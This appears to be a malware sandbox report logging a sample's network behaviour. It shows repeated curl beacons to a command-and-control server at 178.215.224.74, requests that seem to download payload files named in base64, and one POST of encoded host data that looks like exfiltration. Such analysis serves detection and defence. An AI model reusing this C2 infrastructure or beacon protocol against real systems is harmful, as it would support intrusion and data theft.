Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=31 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=7 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=10&melq=1 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?gi HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=33&jwvs=9A5605DE11447A0E2031624EE8FBDE HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=3&jwvs=9A5605DE11447A0E2031624EE8FBDE&vprl=2 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?gi HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=3&jwvs=9A5605DE11447A0E2031624EE8FBDE&vprl=2 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.252User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=8 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=2021&jwvs=9A5605DE11447A0E2031624EE8FBDE HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=3002&melq=e3ad1d0b2449c169e66efe472513a377*6&jwvs=9A5605DE11447A0E2031624EE8FBDE HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=2016&jwvs=9A5605DE11447A0E2031624EE8FBDE&bsxa=1 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficHTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global trafficDNS traffic detected: DNS query: mCpLognXwrhUlFWj.mCpLognXwrhUlFWj
Source: unknownHTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 625Cache-Control: no-cacheData Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 39 41 35 36 30 35 44 45 31 31 34 34 37 41 30 45 32 30 33 31 36 32 34 45 45 38 46 42 44 45 26 6d 65 6c 71 3d 4d 54 41 77 4b 44 6b 79 4d 6a 45 38 4b 45 45 79 58 46 64 78 5a 33 42 78 58 6d 70 74 5a 6d 31 78 58 6b 46 79 63 45 52 68 64 47 46 63 55 47 64 6a 62 57 6c 75 5a 56 35 45 62 32 35 77 61 47 6c 73 52 48 31 74 63 6e 46 63 4d 6a 73 79 4d 6a 4a 48 4d 6a 49 76 4d 6b 4d 77 4d 43 38 38 4e 7a 45 7a 4a 54 51 78 53 6a 6c 5a 51 6c 38 7a 4d 6a 49 71 4d 7a 67 34 4f 7a 45 71 64 57 6c 75 5a 47 39 33 63 79 4a 73 5a 32 5a 6c 62 6d 5a 6e 63 6c 74 43 58 54 45 77 4d 69 6f 35 4d 44 49 7a 4d 43 6f 7a 4e 7a 6f 73 4d 44 45 33 4c 44 41 79 4e 43 34 77 50 54 42 62 51 46 55 7a 4d 6a 67 71 4d 7a 49 79 4d 7a 41 6f 4d 54 55 77 4a 6a 41 7a 4e 53 77 79 4d 6a 51 75 4e 7a 52 5a 53 46 38 78 4d 44 41 6f 4d 7a 41 77 4d 7a 45 71 4d 54 55 34 4a 6a 49 7a 4e 79 34 79 4d 44 51 73 4e 54 5a 62 51 6c 38 77 4b 6a 49 77 4e 79 4a 42 4f 6c 78 64 63 57 64 36 63 31 35 6f 62 57 78 6e 63 56 78 44 65 48 68 47 59 33 52 6a 58 46 4a 76 59 57 31 70 62 47 39 65 52 47 39 73 63 6d 70 70 62 6b 5a 31 62 58 42 78 58 47 6c 36 64 48 55 75 5a 58 70 6c 57 55 4a 66 4d 54 49 79 4b 44 45 77 4d 44 4d 35 4b 44 45 33 4d 43 77 77 4f 54 55 73 4d 44 41 32 4c 44 55 30 57 55 68 56 4d 43 67 79 4d 6a 55 71 51 7a 70 63 56 58 46 74 63 48 4e 63 61 6d 31 73 5a 58 4e 65 51 58 42 77 52 6d 46 38 59 56 35 51 62 32 46 76 61 57 78 6c 58 6b 52 74 62 6e 4a 6f 61 57 35 47 66 57 39 77 63 31 52 36 61 6e 39 78 4c 48 68 72 63 6c 6c 43 58 54 4d 34 4f 43 67 7a 4d 44 4d 79 4d 79 70 44 4f 6c 78 58 65 32 64 79 63 31 78 6f 62 57 35 6c 63 56 78 42 63 48 4a 45 61 58 52 6a 58 6c 4a 76 59 32 31 72 62 47 56 63 52 6d 31 75 63 47 68 70 62 45 78 33 62 58 42 37 58 6e 70 67 64 33 4d 73 65 47 74 79 57 55 42 66 4f 54 67 79 4b 44 45 79 4d 44 45 78 4b 6a 45 33 4f 69 59 77 4d 54 55 75 4d 44 41 30 4c 6a 55 30 57 30 42 66 Data Ascii: jspo=34&jwvs=9A5605DE11447A0E2031624EE8FBDE&melq=MTAwKDkyMjE8KEEyXFdxZ3BxXmptZm1xXkFycERhdGFcUGdjbWluZV5Eb25waGlsRH1tcnFcMjsyMjJHMjIvMkMwMC88NzEzJTQxSjlZQl8zMjIqMzg4OzEqdWluZG93cyJsZ2ZlbmZncltCXTEwMio5MDIzMCozNzosMDE3LDAyNC4wPTBbQFUzMjgqMzIyMzAoMTUwJjAzNSwyMjQuNzRZSF8xMDAoMzAwMzEqMTU4JjIzNy4yMDQsNTZbQl8wKjIwNyJBOlxdcWd6c15obWxncVxDeHhGY3RjXFJvYW1pbG9eRG9scmppbkZ1bXBxXGl6dHUuZXplWUJfMTIyKDEwMDM5KDE3MCwwOTUsMDA2LDU0WUhVMCgyMjUqQzpcVXFtcHNcam1sZXNeQXBwRmF8YV5Qb2FvaWxlXkRtbnJoaW5GfW9wc1R6an9xLHhrcllCXTM4OCgzMDMyMypDOlxXe2dyc1xobW5lcVxBcHJEaXRjXlJvY21rbGVcRm1ucGhpbEx3bXB7Xnpgd3MseGtyWUBfOTgyKDEyMDExKjE3OiYwMTUuMDA0LjU0W0Bf
Source: azvw.exe, 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: ftp://ftp.info-zip.org/pub/infozip
Source: curl.exe, 00000016.00000002.2522190668.0000000000A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.252/v10/ukyh
Source: curl.exe, 00000016.00000002.2522190668.0000000000A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.252/v10/ukyh.php?jspo=6
Source: curl.exe, 00000055.00000002.3021797267.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000059.00000002.3066064428.0000000003078000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000005E.00000002.3087963888.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000061.00000002.3106467022.0000000003588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.
Source: curl.exe, 00000040.00000002.2846406096.0000000003278000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.8
Source: curl.exe, 0000005E.00000002.3087963888.00000000033F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?gi
Source: curl.exe, 0000005E.00000002.3087963888.00000000033F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?gi.224.74ur32.dll
Source: curl.exe, 0000004C.00000002.2931976614.00000000032F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=10&melq=1
Source: curl.exe, 0000004C.00000002.2931976614.00000000032F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=10&melq=1%
Source: curl.exe, 00000038.00000002.2799649207.00000000009C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=31
Source: curl.exe, 00000055.00000002.3021797267.00000000008B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldml
Source: curl.exe, 00000026.00000002.2666947968.0000000003208000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D
Source: curl.exe, 0000002F.00000002.2756880706.0000000000B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D
Source: curl.exe, 0000002F.00000002.2756880706.0000000000B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3Db
Source: curl.exe, 0000001D.00000002.2606200469.0000000000C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=5
Source: curl.exe, 0000001D.00000002.2606200469.0000000000C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=5W5
Source: curl.exe, 00000061.00000002.3106467022.0000000003588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=6
Source: curl.exe, 0000004F.00000002.2949097146.0000000000BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=6ecur32.dll
Source: curl.exe, 00000023.00000002.2639422420.0000000000898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=6ecur32.dllr
Source: curl.exe, 00000046.00000002.2895434106.0000000003548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=7
Source: curl.exe, 0000001A.00000002.2589388864.0000000000A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.215.224.74/v10/ukyh.u
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmp, RevenueDevices.exe, 00000056.00000003.3042089063.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Million.0.dr, Ur.pif.1.dr, Disco.86.dr, Either.pif.90.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmp, RevenueDevices.exe, 00000056.00000003.3042089063.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Million.0.dr, Ur.pif.1.dr, Disco.86.dr, Either.pif.90.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmp, RevenueDevices.exe, 00000056.00000003.3042089063.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Million.0.dr, Ur.pif.1.dr, Disco.86.dr, Either.pif.90.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmp, RevenueDevices.exe, 00000056.00000003.3042089063.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Million.0.dr, Ur.pif.1.dr, Disco.86.dr, Either.pif.90.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RevenueDevices.exe.10.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://ocsp.digicert.com0
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://ocsp.digicert.com0A
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://ocsp.digicert.com0C
Source: vqMMwqCFZQ.exe, RevenueDevices.exe.10.drString found in binary or memory: http://ocsp.digicert.com0X
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmp, RevenueDevices.exe, 00000056.00000003.3042089063.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Million.0.dr, Ur.pif.1.dr, Disco.86.dr, Either.pif.90.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmp, RevenueDevices.exe, 00000056.00000003.3042089063.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Million.0.dr, Ur.pif.1.dr, Disco.86.dr, Either.pif.90.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmp, RevenueDevices.exe, 00000056.00000003.3042089063.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Million.0.dr, Ur.pif.1.dr, Disco.86.dr, Either.pif.90.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmp, RevenueDevices.exe, 00000056.00000003.3042089063.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Million.0.dr, Ur.pif.1.dr, Disco.86.dr, Either.pif.90.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmp, RevenueDevices.exe, 00000056.00000003.3042089063.00000000028C5000.00000004.00000020.00020000.00000000.sdmp, Million.0.dr, Ur.pif.1.dr, Disco.86.dr, Either.pif.90.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: vqMMwqCFZQ.exe, 00000000.00000003.1702660616.00000000029C7000.00000004.00000020.00020000.00000000.sdmp, Ur.pif, 0000000A.00000000.1743568156.00000000006D9000.00000002.00000001.01000000.00000006.sdmp, Million.0.dr, Ur.pif.1.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
